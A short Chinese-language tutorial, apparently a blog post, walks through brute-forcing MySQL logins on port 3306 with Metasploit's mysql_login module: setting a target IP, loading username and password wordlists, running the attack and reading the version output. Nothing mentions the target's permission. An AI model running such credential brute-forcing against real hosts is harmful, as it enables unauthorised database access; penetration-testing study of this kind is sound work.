msf mysql prot:3306

  1. nmap掃出3306端口的話,就往下;mysql

  2. 搜索漏洞sql

msf > search  mysql_login
  1. 使用該漏洞
msf > use auxiliary/scanner/mysql/mysql_login
  1. 查看該漏洞用法
msf auxiliary(mysql_login) > show options
  1. 向rhosts輸入ip,看到能夠正常訪問mysql
msf auxiliary(mysql_login) > set rhosts 121.42.27.192
  1. 找一個測試爆破的用戶名字典和密碼字典進行爆破
msf auxiliary(mysql_login) > set user_file  /usr/share/metasploit-framework/data/wordlists/unix_users.txt  

msf auxiliary(mysql_login) > set pass_file   /usr/share/sparta/wordlists/mysql-default-userpass.txt
  1. run
msf auxiliary(mysql_login) > run

# 運行能夠查看到mysql版本爲5.6.29
[*] 121.42.27.192:3306 MYSQL - Found remote MySQL version 5.6.29
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
# 看到綠色加號即爲破解成功!
相關文章
相關標籤/搜索